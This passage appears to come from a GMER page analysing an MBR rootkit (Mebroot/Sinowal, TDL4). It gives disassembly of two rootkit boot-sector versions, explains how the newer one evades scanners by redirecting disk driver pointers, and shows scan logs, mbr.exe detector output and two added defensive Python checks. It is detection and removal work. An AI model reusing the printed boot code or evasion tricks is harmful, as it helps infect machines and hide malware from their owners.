    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_WRITE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A64 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_CLOSE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    
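As an added example (not GMER's code) of turning a trace like the one above into a check, the script below parses its nt!IoBuildSynchronousFsdRequest lines, maps each write's byte offset to LBA sectors (0x7800 is sector 60; 0x7FB90000 is the offset 2 142 830 592 at which the driver body is written) and, using a partition table parsed from an MBR image, flags every write that lands outside a partition: sector 0, the gap before the first partition, a partition boot record, or the unpartitioned tail of the disk. The disk geometry, the MBR image and the trace lines are constructed for the example.

```python
"""Audit raw-disk write requests against the MBR partition table.

Added example, not GMER's code. Parses nt!IoBuildSynchronousFsdRequest lines
in the trace format used on this page, maps each write's 16-digit byte offset
to LBA sectors and reports writes that land outside every partition: on the
MBR (sector 0), in the gap before the first partition, or in the unpartitioned
tail of the disk. Disk geometry, MBR image and trace lines are constructed.
"""
import re
import struct

SECTOR = 512

# One trace line looks like (constructed, same shape as the page's log):
# nt!IoBuildSynchronousFsdRequest( IRP_MJ_WRITE, "\Driver\Disk", 0x819BD5A0, 512, 0000000000007800 )
TRACE_RE = re.compile(
    r'IoBuildSynchronousFsdRequest\(\s*(IRP_MJ_\w+),\s*"([^"]*)",\s*'
    r'0x[0-9A-Fa-f]+,\s*(\d+),\s*([0-9A-Fa-f]{16})\s*\)'
)


def parse_partition_table(mbr: bytes) -> list:
    """Return the non-empty entries of the 4-slot partition table at offset 446."""
    if len(mbr) < SECTOR or mbr[510:512] != b"\x55\xaa":
        raise ValueError("missing 0x55AA boot signature")
    parts = []
    for i in range(4):
        # status, CHS start (3 bytes, skipped), type, CHS end (skipped), LBA start, count
        status, ptype, start, count = struct.unpack_from("<B3xB3xII", mbr, 446 + 16 * i)
        if ptype and count:
            parts.append({"status": status, "type": ptype, "start": start, "end": start + count})
    return parts


def build_mbr(entries) -> bytes:
    """Constructed MBR image from (type, lba_start, count) tuples; boot code left zeroed."""
    mbr = bytearray(SECTOR)
    for i, (ptype, start, count) in enumerate(entries):
        struct.pack_into("<B3xB3xII", mbr, 446 + 16 * i, 0x80 if i == 0 else 0, ptype, start, count)
    mbr[510:512] = b"\x55\xaa"
    return bytes(mbr)


def classify_sector(lba: int, parts: list, disk_sectors: int) -> str:
    """Name the region an LBA falls in: MBR, PBR, partition, gap, tail or beyond-disk."""
    if lba == 0:
        return "MBR"
    if lba >= disk_sectors:
        return "beyond-disk"
    for p in parts:
        if lba == p["start"]:
            return "PBR"            # first sector of a partition: its boot record
        if p["start"] < lba < p["end"]:
            return "partition"
    if not parts or lba >= max(p["end"] for p in parts):
        return "tail"               # unpartitioned space after the last partition
    return "gap"                    # between the MBR and the first partition, or between partitions


def parse_trace(lines):
    """Yield (major_function, device, length, byte_offset) for each matching line."""
    for line in lines:
        m = TRACE_RE.search(line)
        if m:
            yield m.group(1), m.group(2), int(m.group(3)), int(m.group(4), 16)


def audit_writes(lines, mbr: bytes, disk_sectors: int) -> list:
    """Return (offset, length, regions) for every IRP_MJ_WRITE not wholly inside a partition."""
    parts = parse_partition_table(mbr)
    findings = []
    for major, _device, length, offset in parse_trace(lines):
        if major != "IRP_MJ_WRITE" or length == 0:
            continue
        first, last = offset // SECTOR, (offset + length - 1) // SECTOR
        regions = sorted({classify_sector(s, parts, disk_sectors) for s in range(first, last + 1)})
        if regions != ["partition"]:
            findings.append((offset, length, regions))
    return findings


# Constructed 2 GiB disk with one NTFS partition at LBA 63 (classic CHS-aligned
# layout) that ends before the disk's last sectors.
DISK_SECTORS = 2 * 1024 ** 3 // SECTOR          # 4 194 304 sectors
SAMPLE_MBR = build_mbr([(0x07, 63, 4_177_000)])

# Constructed trace lines; the offsets are the ones written in the trace above.
SAMPLE_TRACE = [
    'F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_READ, "\\Driver\\Disk", 0x819BD5A0, 512, 0000000000007800 )',
    'F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_WRITE, "\\Driver\\Disk", 0x818D9000, 232448, 000000007FB90000 )',
    'F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_WRITE, "\\Driver\\Disk", 0x819BD5A0, 512, 0000000000007800 )',
    'F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_WRITE, "\\Driver\\Disk", 0x819BD5A0, 512, 0000000000007A00 )',
    'F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_WRITE, "\\Driver\\Disk", 0x819BD5A0, 512, 0000000000007C00 )',
    'F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_WRITE, "\\Driver\\Disk", 0x819BD5A0, 512, 0000000000000000 )',
]

if __name__ == "__main__":
    for offset, length, regions in audit_writes(SAMPLE_TRACE, SAMPLE_MBR, DISK_SECTORS):
        first, last = offset // SECTOR, (offset + length - 1) // SECTOR
        print(f"write @ 0x{offset:016X} ({length} bytes) -> LBA {first}..{last}: {', '.join(regions)}")
```

Against the sample trace the audit reports the large write as the unpartitioned tail, the three 512-byte writes as sectors 60, 61 and 62 in the gap before the first partition, and the final write as the MBR; reads are parsed but not flagged.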

    Conclusion


    When thinking about how to protect against this threat, we should remember that BIOS MBR protection and all software-based solutions can fail once the attacker moves the malicious code from the MBR to the partition boot record. The partition boot record has the same potential as the MBR and could also be used to compromise the OS.

    Hopefully, new technologies like TPM will help improve security.




    Update

    Mar 26th, 2008

    The author of the rootkit has released another, improved version of the malware. The rootkit gang decided to continue the cat-and-mouse game: to be more effective against AV scanners and removal tools, they changed the MBR sector code, and the malware now uses a few tricks to cheat removal tools.

    old rootkit MBR code

    cs:7c00 (01) fa                       CLI
    cs:7c01 (02) 33db                     XOR BX, BX
    cs:7c03 (02) 8ed3                     MOV SS, BX
    cs:7c05 (05) 36 8926 fe7b             MOV SS:[0x7bfe], SP
    cs:7c0a (03) bc fe7b                  MOV SP, 0x7bfe
    cs:7c0d (01) 1e                       PUSH DS
    cs:7c0e (02) 66 60                    PUSHAD
    cs:7c10 (01) fc                       CLD
    cs:7c11 (02) 8edb                     MOV DS, BX
    cs:7c13 (03) be 1304                  MOV SI, 0x413
    cs:7c16 (03) 832c 02                  SUB WORD [SI], 0x2
    cs:7c19 (01) ad                       LODSW
    cs:7c1a (03) c1e0 06                  SHL AX, 0x6
    cs:7c1d (02) 8ec0                     MOV ES, AX
    cs:7c1f (03) be 007c                  MOV SI, 0x7c00
    cs:7c22 (02) 33ff                     XOR DI, DI
    cs:7c24 (03) b9 0001                  MOV CX, 0x100
    cs:7c27 (02) f3 a5                    REP MOVSW
    cs:7c29 (03) b8 0202                  MOV AX, 0x202
    cs:7c2c (02) b1 3d                    MOV CL, 0x3d
    cs:7c2e (03) ba 8000                  MOV DX, 0x80
    cs:7c31 (02) 8bdf                     MOV BX, DI
    cs:7c33 (02) cd 13                    INT 0x13
    cs:7c35 (02) 33db                     XOR BX, BX
    cs:7c37 (04) 66 8b47 4c               MOV EAX, [BX+0x4c]
    cs:7c3b (05) 66 26 a3 7300            MOV ES:[0x73], EAX
    cs:7c40 (05) c747 4c 6600             MOV WORD [BX+0x4c], 0x66
    cs:7c45 (03) 8c47 4e                  MOV WORD [BX+0x4e], ES
    cs:7c48 (01) 06                       PUSH ES
    cs:7c49 (03) 68 4d00                  PUSH 0x4d
    cs:7c4c (01) cb                       RETF
    cs:7c4d (01) fb                       STI
    cs:7c4e (02) 8ec3                     MOV ES, BX
    cs:7c50 (03) b8 0102                  MOV AX, 0x201
    cs:7c53 (03) b9 3f00                  MOV CX, 0x3f
    cs:7c56 (03) ba 8000                  MOV DX, 0x80
    cs:7c59 (02) b7 7c                    MOV BH, 0x7c
    cs:7c5b (02) cd 13                    INT 0x13
    cs:7c5d (02) 66 61                    POPAD
    cs:7c5f (01) 1f                       POP DS
    cs:7c60 (01) 5c                       POP SP
    cs:7c61 (05) ea 007c 0000             JMP FAR 0x0:0x7c00
    cs:7c66 (01) 9c                       PUSHF
    cs:7c67 (03) 80fc 42                  CMP AH, 0x42
    cs:7c6a (02) 74 0b                    JZ 0x7c77
    cs:7c6c (03) 80fc 02                  CMP AH, 0x2
    cs:7c6f (02) 74 06                    JZ 0x7c77
    cs:7c71 (01) 9d                       POPF
    cs:7c72 (05) ea 0000 0000             JMP FAR 0x0:0x0
    cs:7c77 (05) 2e 8826 9000             MOV CS:[0x90], AH
    cs:7c7c (01) 9d                       POPF
    cs:7c7d (01) 9c                       PUSHF
    cs:7c7e (05) 2e ff1e 7300             CALL FAR WORD CS:[0x73]
    cs:7c83 (04) 0f82 9d00                JB 0x7d24
    cs:7c87 (01) 9c                       PUSHF
    cs:7c88 (01) fa                       CLI
    cs:7c89 (01) 06                       PUSH ES
    cs:7c8a (02) 66 60                    PUSHAD
    cs:7c8c (01) fc                       CLD
    cs:7c8d (02) b4 00                    MOV AH, 0x0
    cs:7c8f (02) b5 00                    MOV CH, 0x0
    cs:7c91 (03) 80fd 42                  CMP CH, 0x42
    cs:7c94 (02) 75 04                    JNZ 0x7c9a
    cs:7c96 (01) ad                       LODSW
    cs:7c97 (01) ad                       LODSW
    cs:7c98 (02) c41c                     LES BX, WORD [SI]
    cs:7c9a (02) 85c0                     TEST AX, AX
    cs:7c9c (02) 75 01                    JNZ 0x7c9f
    cs:7c9e (01) 40                       INC AX
    cs:7c9f (02) 8bc8                     MOV CX, AX
    cs:7ca1 (02) b0 8b                    MOV AL, 0x8b
    cs:7ca3 (03) c1e1 09                  SHL CX, 0x9
    cs:7ca6 (02) 8bfb                     MOV DI, BX
    cs:7ca8 (01) 60                       PUSHA
    cs:7ca9 (02) f2 ae                    REPNZ SCASB
    cs:7cab (02) 75 47                    JNZ 0x7cf4
    cs:7cad (08) 66 26 813d f085f674      CMP DWORD ES:[DI], 0x74f685f0
    cs:7cb5 (02) 75 f2                    JNZ 0x7ca9
    cs:7cb7 (06) 26 817d 05 803d          CMP WORD ES:[DI+0x5], 0x3d80
    cs:7cbd (02) 75 ea                    JNZ 0x7ca9
    cs:7cbf (04) 26 8a45 04               MOV AL, ES:[DI+0x4]
    cs:7cc3 (02) 3c 21                    CMP AL, 0x21
    cs:7cc5 (02) 74 04                    JZ 0x7ccb
    cs:7cc7 (02) 3c 22                    CMP AL, 0x22
    cs:7cc9 (02) 75 de                    JNZ 0x7ca9
    cs:7ccb (03) be 0b02                  MOV SI, 0x20b
    cs:7cce (04) 2e 803c 00               CMP BYTE CS:[SI], 0x0
    cs:7cd2 (02) 75 20                    JNZ 0x7cf4
    cs:7cd4 (03) 2e 8804                  MOV CS:[SI], AL
    cs:7cd7 (06) 26 c745 ff ff15          MOV WORD ES:[DI-0x1], 0x15ff
    cs:7cdd (03) 66 8cc8                  MOV EAX, CS
    cs:7ce0 (04) 66 c1e0 04               SHL EAX, 0x4
    cs:7ce4 (03) 05 0002                  ADD AX, 0x200
    cs:7ce7 (05) 66 2e a3 fc01            MOV CS:[0x1fc], EAX
    cs:7cec (03) 2d 0400                  SUB AX, 0x4
    cs:7cef (05) 66 26 8945 01            MOV ES:[DI+0x1], EAX
    cs:7cf4 (01) 61                       POPA
    cs:7cf5 (02) b0 83                    MOV AL, 0x83
    cs:7cf7 (02) f2 ae                    REPNZ SCASB
    cs:7cf9 (02) 75 25                    JNZ 0x7d20
    cs:7cfb (08) 66 26 813d c402e900      CMP DWORD ES:[DI], 0xe902c4
    cs:7d03 (02) 75 f2                    JNZ 0x7cf7
    cs:7d05 (09) 66 26 817d 04 00e9fdff   CMP DWORD ES:[DI+0x4], 0xfffde900
    cs:7d0e (02) 75 e7                    JNZ 0x7cf7
    cs:7d10 (09) 66 26 c745 fc 90909083   MOV DWORD ES:[DI-0x4], 0x83909090
    cs:7d19 (05) 26 8365 06 00            AND WORD ES:[DI+0x6], 0x0
    cs:7d1e (02) eb d7                    JMP 0x7cf7
    cs:7d20 (02) 66 61                    POPAD
    cs:7d22 (01) 07                       POP ES
    cs:7d23 (01) 9d                       POPF
    cs:7d24 (03) ca 0200                  RETF 0x2

    new rootkit MBR code

    cs:7c00 (01) fa                       CLI
    cs:7c01 (02) 33db                     XOR BX, BX
    cs:7c03 (02) 8ed3                     MOV SS, BX
    cs:7c05 (05) 36 8926 fe7b             MOV SS:[0x7bfe], SP
    cs:7c0a (03) bc fe7b                  MOV SP, 0x7bfe
    cs:7c0d (01) 1e                       PUSH DS
    cs:7c0e (02) 66 60                    PUSHAD
    cs:7c10 (01) fc                       CLD
    cs:7c11 (02) 8edb                     MOV DS, BX
    cs:7c13 (03) be 1304                  MOV SI, 0x413
    cs:7c16 (03) 832c 02                  SUB WORD [SI], 0x2
    cs:7c19 (01) ad                       LODSW
    cs:7c1a (03) c1e0 06                  SHL AX, 0x6
    cs:7c1d (02) 8ec0                     MOV ES, AX
    cs:7c1f (03) be 007c                  MOV SI, 0x7c00
    cs:7c22 (02) 33ff                     XOR DI, DI
    cs:7c24 (03) b9 0001                  MOV CX, 0x100
    cs:7c27 (02) f3 a5                    REP MOVSW
    cs:7c29 (03) b8 0202                  MOV AX, 0x202
    cs:7c2c (02) b1 3d                    MOV CL, 0x3d
    cs:7c2e (03) ba 8000                  MOV DX, 0x80
    cs:7c31 (02) 8bdf                     MOV BX, DI
    cs:7c33 (02) cd 13                    INT 0x13
    cs:7c35 (02) 33db                     XOR BX, BX
    
    cs:7c37 (01) 90                       NOP
     
    cs:7c38 (04) 66 8b47 4c               MOV EAX, [BX+0x4c]
    cs:7c3c (05) 66 26 a3 7400            MOV ES:[0x74], EAX
    cs:7c41 (05) c747 4c 6700             MOV WORD [BX+0x4c], 0x67
    cs:7c46 (03) 8c47 4e                  MOV WORD [BX+0x4e], ES
    cs:7c49 (01) 06                       PUSH ES
    cs:7c4a (03) 68 4e00                  PUSH 0x4e
    cs:7c4d (01) cb                       RETF
    cs:7c4e (01) fb                       STI
    cs:7c4f (02) 8ec3                     MOV ES, BX
    cs:7c51 (03) b8 0102                  MOV AX, 0x201
    cs:7c54 (03) b9 3f00                  MOV CX, 0x3f
    cs:7c57 (03) ba 8000                  MOV DX, 0x80
    cs:7c5a (02) b7 7c                    MOV BH, 0x7c
    cs:7c5c (02) cd 13                    INT 0x13
    cs:7c5e (02) 66 61                    POPAD
    cs:7c60 (01) 1f                       POP DS
    cs:7c61 (01) 5c                       POP SP
    cs:7c62 (05) ea 007c 0000             JMP FAR 0x0:0x7c00
    cs:7c67 (01) 9c                       PUSHF
    cs:7c68 (03) 80fc 42                  CMP AH, 0x42
    cs:7c6b (02) 74 0b                    JZ 0x7c78
    cs:7c6d (03) 80fc 02                  CMP AH, 0x2
    cs:7c70 (02) 74 06                    JZ 0x7c78
    cs:7c72 (01) 9d                       POPF
    cs:7c73 (05) ea 0000 0000             JMP FAR 0x0:0x0
    cs:7c78 (05) 2e 8826 9100             MOV CS:[0x91], AH
    cs:7c7d (01) 9d                       POPF
    cs:7c7e (01) 9c                       PUSHF
    cs:7c7f (05) 2e ff1e 7400             CALL FAR WORD CS:[0x74]
    cs:7c84 (04) 0f82 9d00                JB 0x7d25
    cs:7c88 (01) 9c                       PUSHF
    cs:7c89 (01) fa                       CLI
    cs:7c8a (01) 06                       PUSH ES
    cs:7c8b (02) 66 60                    PUSHAD
    cs:7c8d (01) fc                       CLD
    cs:7c8e (02) b4 00                    MOV AH, 0x0
    cs:7c90 (02) b5 00                    MOV CH, 0x0
    cs:7c92 (03) 80fd 42                  CMP CH, 0x42
    cs:7c95 (02) 75 04                    JNZ 0x7c9b
    cs:7c97 (01) ad                       LODSW
    cs:7c98 (01) ad                       LODSW
    cs:7c99 (02) c41c                     LES BX, WORD [SI]
    cs:7c9b (02) 85c0                     TEST AX, AX
    cs:7c9d (02) 75 01                    JNZ 0x7ca0
    cs:7c9f (01) 40                       INC AX
    cs:7ca0 (02) 8bc8                     MOV CX, AX
    cs:7ca2 (02) b0 8b                    MOV AL, 0x8b
    cs:7ca4 (03) c1e1 09                  SHL CX, 0x9
    cs:7ca7 (02) 8bfb                     MOV DI, BX
    cs:7ca9 (01) 60                       PUSHA
    cs:7caa (02) f2 ae                    REPNZ SCASB
    cs:7cac (02) 75 47                    JNZ 0x7cf5
    cs:7cae (08) 66 26 813d f085f674      CMP DWORD ES:[DI], 0x74f685f0
    cs:7cb6 (02) 75 f2                    JNZ 0x7caa
    cs:7cb8 (06) 26 817d 05 803d          CMP WORD ES:[DI+0x5], 0x3d80
    cs:7cbe (02) 75 ea                    JNZ 0x7caa
    cs:7cc0 (04) 26 8a45 04               MOV AL, ES:[DI+0x4]
    cs:7cc4 (02) 3c 21                    CMP AL, 0x21
    cs:7cc6 (02) 74 04                    JZ 0x7ccc
    cs:7cc8 (02) 3c 22                    CMP AL, 0x22
    cs:7cca (02) 75 de                    JNZ 0x7caa
    cs:7ccc (03) be 0b02                  MOV SI, 0x20b
    cs:7ccf (04) 2e 803c 00               CMP BYTE CS:[SI], 0x0
    cs:7cd3 (02) 75 20                    JNZ 0x7cf5
    cs:7cd5 (03) 2e 8804                  MOV CS:[SI], AL
    cs:7cd8 (06) 26 c745 ff ff15          MOV WORD ES:[DI-0x1], 0x15ff
    cs:7cde (03) 66 8cc8                  MOV EAX, CS
    cs:7ce1 (04) 66 c1e0 04               SHL EAX, 0x4
    cs:7ce5 (03) 05 0002                  ADD AX, 0x200
    cs:7ce8 (05) 66 2e a3 fc01            MOV CS:[0x1fc], EAX
    cs:7ced (03) 2d 0400                  SUB AX, 0x4
    cs:7cf0 (05) 66 26 8945 01            MOV ES:[DI+0x1], EAX
    cs:7cf5 (01) 61                       POPA
    cs:7cf6 (02) b0 83                    MOV AL, 0x83
    cs:7cf8 (02) f2 ae                    REPNZ SCASB
    cs:7cfa (02) 75 25                    JNZ 0x7d21
    cs:7cfc (08) 66 26 813d c402e900      CMP DWORD ES:[DI], 0xe902c4
    cs:7d04 (02) 75 f2                    JNZ 0x7cf8
    cs:7d06 (09) 66 26 817d 04 00e9fdff   CMP DWORD ES:[DI+0x4], 0xfffde900
    cs:7d0f (02) 75 e7                    JNZ 0x7cf8
    cs:7d11 (09) 66 26 c745 fc 90909083   MOV DWORD ES:[DI-0x4], 0x83909090
    cs:7d1a (05) 26 8365 06 00            AND WORD ES:[DI+0x6], 0x0
    cs:7d1f (02) eb d7                    JMP 0x7cf8
    cs:7d21 (02) 66 61                    POPAD
    cs:7d23 (01) 07                       POP ES
    cs:7d24 (01) 9d                       POPF
    cs:7d25 (03) ca 0200                  RETF 0x2
    

    To deceive the few available detection/removal tools (including GMER), the new version of the rootkit modifies the original pointers to CLASSPNP!ClassReadWrite in the CLASSPNP.SYS!ClassInitialize function and the pointers in the \Device\CdRom0 MajorFunction table. The previous version of GMER located the original CLASSPNP!ClassReadWrite pointer through the \Device\CdRom0 MajorFunction table, so it can no longer read the infected MBR.

    However, all these new malware tricks imply more changes visible in the log; see the old GMER 1.0.12 scan below.

    GMER 1.0.12.12010 - http://www.gmer.net
    Rootkit scan 2008-03-26 09:01:20
    Windows 5.1.2600 Dodatek Service Pack 2
    
    
    ---- Kernel code sections - GMER 1.0.12 ----
    
    PAGE    CLASSPNP.SYS!ClassInitialize + F4                                  F9A934B2 4 Bytes  [ 7E, 78, 82, 81 ]
    PAGE    CLASSPNP.SYS!ClassInitialize + FF                                  F9A934BD 4 Bytes  [ 28, 24, 82, 81 ]
    PAGE    CLASSPNP.SYS!ClassInitialize + 10A                                 F9A934C8 4 Bytes  [ 90, 78, 82, 81 ]
    PAGE    CLASSPNP.SYS!ClassInitialize + 111                                 F9A934CF 4 Bytes  [ 84, 78, 82, 81 ]
    PAGE    CLASSPNP.SYS!ClassInitialize + 118                                 F9A934D6 4 Bytes  [ 8A, 78, 82, 81 ]
    PAGE    ...                                                                
    
    ---- Devices - GMER 1.0.12 ----
    
    Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_CREATE                         8182787E
    Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_CLOSE                          8182787E
    Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_READ                           81822428
    Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_WRITE                          81822428
    Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_FLUSH_BUFFERS                  81827890
    Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_DEVICE_CONTROL                 8182788A
    Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_INTERNAL_DEVICE_CONTROL        81827884
    Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_SHUTDOWN                       81827890
    Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_POWER                          8182789C
    Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_SYSTEM_CONTROL                 818278A2
    Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_PNP                            81827896
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_CREATE                   8182787E
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_CLOSE                    8182787E
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_READ                     81822428
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_WRITE                    81822428
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_FLUSH_BUFFERS            81827890
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_DEVICE_CONTROL           8182788A
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_INTERNAL_DEVICE_CONTROL  81827884
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_SHUTDOWN                 81827890
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_POWER                    8182789C
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_SYSTEM_CONTROL           818278A2
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_PNP                      81827896
    
    ---- Threads - GMER 1.0.12 ----
    
    Thread  4:444                                                              81827BF6
    Thread  4:1672                                                             818299A0
    Thread  4:1680                                                             81821E5C
    Thread  4:480                                                              81827F38
    Thread  4:464                                                              8185A0A0
    Thread  4:468                                                              818471A0
    Thread  4:488                                                              8188FDD0
    Thread  4:1524                                                             81833220
    
    ---- EOF - GMER 1.0.12 ----
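The GMER "Devices" section above is what the pointer redirection described earlier looks like from the outside: every IRP_MJ entry of both \Driver\Cdrom and \Driver\Disk resolves to addresses of the form 0x8182xxxx, far from the CLASSPNP.SYS image whose ClassInitialize sits at 0xF9A9xxxx. The following Python script is an added example (not part of the original page or of GMER) that parses such log lines and flags dispatch pointers that no loaded module image backs. The sample log excerpt and the module address ranges are constructed for the example; on a real system the ranges would come from the loaded-module list.

```python
import re
from collections import defaultdict

# Constructed sample: a few "Devices" lines in the format of the GMER 1.0.12 log above.
SAMPLE_LOG = r"""
---- Devices - GMER 1.0.12 ----

Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_CREATE                         8182787E
Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_READ                           81822428
Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_WRITE                          81822428
Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_CREATE                   8182787E
Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_READ                     81822428
Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_WRITE                    81822428
Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_PNP                      81827896

---- EOF - GMER 1.0.12 ----
"""

# Constructed module ranges (hypothetical values, only loosely based on the
# CLASSPNP!ClassInitialize address shown in the log); a real check would take
# them from the kernel's loaded-module list.
MODULE_RANGES = {
    "CLASSPNP.SYS": (0xF9A90000, 0xF9AA0000),
    "disk.sys":     (0xF9AB0000, 0xF9AB8000),
    "cdrom.sys":    (0xF9AC0000, 0xF9ACA000),
}

DEVICE_LINE = re.compile(
    r"^Device\s+(\\Driver\\\S+)\s+(\\Device\\\S+)\s+(IRP_MJ_\w+)\s+([0-9A-Fa-f]{8})\s*$"
)

def parse_device_entries(log: str):
    """One dict per 'Device' line: driver, device object, IRP major function, handler address."""
    entries = []
    for line in log.splitlines():
        m = DEVICE_LINE.match(line.strip())
        if m:
            driver, device, irp, addr = m.groups()
            entries.append({"driver": driver, "device": device, "irp": irp, "addr": int(addr, 16)})
    return entries

def find_shared_dispatch(entries):
    """Handler addresses used by more than one driver, as (address, sorted driver names).

    Two class drivers linked against CLASSPNP legitimately share its dispatch routines,
    so sharing alone is not proof; it only tells you which pointers to look at next.
    """
    by_addr = defaultdict(set)
    for e in entries:
        by_addr[e["addr"]].add(e["driver"])
    return sorted((addr, sorted(drivers)) for addr, drivers in by_addr.items() if len(drivers) > 1)

def find_unbacked_handlers(entries, module_ranges):
    """Entries whose handler lies outside every known module image (pointer into pool memory)."""
    def backed(addr):
        return any(lo <= addr < hi for lo, hi in module_ranges.values())
    return [e for e in entries if not backed(e["addr"])]

if __name__ == "__main__":
    entries = parse_device_entries(SAMPLE_LOG)
    for addr, drivers in find_shared_dispatch(entries):
        print(f"{addr:08X} shared by {', '.join(drivers)}")
    for e in find_unbacked_handlers(entries, MODULE_RANGES):
        print(f"{e['device']} {e['irp']} -> {e['addr']:08X} is not inside any loaded module")
```

The useful signal is the second check: a MajorFunction entry that points into pool memory rather than into a driver image is the redirection GMER reports, whatever name the device carries.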
    

    Detection and removal


    To detect/remove this rootkit, please use the latest version of the mbr.exe tool or GMER.

    Stealth MBR rootkit detector 0.2.2 by Gmer, http://www.gmer.net
    
    device: opened successfully
    user: MBR read successfully
    kernel: MBR read successfully
    MBR rootkit infection detected !
    MBR INT 0x13 hook detected !
    malicious code @ sector 0x3fdc80 size 0x1ca !
    copy of MBR has been found in sector 62 !
    original MBR restored successfully !
    

    All possible options are listed after running the command "mbr -?":

    Stealth MBR rootkit detector 0.2.2 by Gmer, http://www.gmer.net
    
    Usage: mbr.exe [options]
      -f                                          - fix mbr 
      -c start_sector size_in_sectors filename    - copy selected sectors to file
    
    samples of usage:
    
      mbr.exe -c 0 1 copy_of_sector_00
      mbr.exe -c 0x3fdc80 0x1ca copy_of_mbr_rk
    



    Update

    April 15th, 2009

    To detect and remove the latest variant of the rootkit, please use mbr.exe version 0.3.1 or newer.
    
    GMER 1.0.15.14966 - http://www.gmer.net
    Rootkit scan 2009-04-05 17:37:42
    Windows 5.1.2600 Service Pack 1
    
    ---- Devices - GMER 1.0.15 ----
    
    Device  \Driver\atapi \Device\Ide\IdePort0                                                        813A9560
    Device  \Driver\atapi \Device\Ide\IdeDeviceP0T0L0-3                                               813A9560
    Device  \Driver\atapi \Device\Ide\IdePort1                                                        813A9560
    Device  \Driver\atapi \Device\Ide\IdeDeviceP1T0L0-e                                               813A9560
    
    ---- Threads - GMER 1.0.15 ----
    
    Thread  System [4:1672]                                                                           813DA300
    Thread  System [4:1676]                                                                           813C69F6
    Thread  System [4:1692]                                                                           813F8387
    Thread  System [4:1700]                                                                           813C9971
    Thread  System [4:1080]                                                                           813DA300
    Thread  System [4:1084]                                                                           813C69F6
    Thread  System [4:1016]                                                                           813F8387
    Thread  System [4:1108]                                                                           813C9971
    
    ---- EOF - GMER 1.0.15 ----
    
    C:\>mbr.exe -t
    Stealth MBR rootkit/Mebroot/Sinowal detector 0.3.6 by Gmer, http://www.gmer.net
    
    device: opened successfully
    user: MBR read successfully
    called modules: ntkrnlpa.exe CLASSPNP.SYS disk.sys >>UNKNOWN [0x85938E90]<< 
    kernel: MBR read successfully
    detected MBR rootkit hooks:
    \Driver\atapi -> 0x85938e90
    \Device\Harddisk0\DR0 -> ParseProcedure -> 0x8593fc20
    NDIS: Intel(R) 82566DM-2 Gigabit Network Connection -> SendCompleteHandler -> 0x8596e700
    Warning: possible MBR rootkit infection !
    copy of MBR has been found in sector 0x0100A757 
    malicious code @ sector 0x0100A75A !
    PE file found in sector at 0x0100A770 !
    MBR rootkit infection detected ! Use: "mbr.exe -f" to fix.
    
    

    Update 0.4.1 added TDL4 detection

    October 28th, 2010

    C:\>mbr -t -s
    Stealth MBR rootkit/Mebroot/Sinowal/TDL4 detector 0.4.1 by Gmer, http://www.gmer.net
    Windows 5.1.2600 Disk: Maxtor_6Y120P0 rev.YAR41BW0 -> \Device\Ide\IdePort0
    
    device: opened successfully
    user: MBR read successfully
    
    Disk trace:
    called modules: ntoskrnl.exe CLASSPNP.SYS disk.sys ACPI.sys hal.dll >>UNKNOWN [0x866DB566]<<
    _asm { PUSH EBP; MOV EBP, ESP; PUSH ECX; MOV EAX, [EBP+0x8]; CMP EAX, [0x866e1624]; MOV EAX, [0x866e16a0]; PUSH EBX; PUSH ESI; MOV ESI, [EBP+0xc]; MOV EBX, [ESI+0x60]; PUSH EDI; JNZ 0x20; MOV [EBP+0x8], EAX; }
    1 nt!IofCallDriver[0x804E13B9] -> \Device\Harddisk0\DR0[0x8673CAB8]
    3 CLASSPNP[0xF788FFD7] -> nt!IofCallDriver[0x804E13B9] -> \Device\0000005f[0x8677EE88]
    5 ACPI[0xF77E6620] -> nt!IofCallDriver[0x804E13B9] -> [0x86763D98]
    \Driver\atapi[0x86716270] -> IRP_MJ_CREATE -> 0x866DB566
    kernel: MBR read successfully
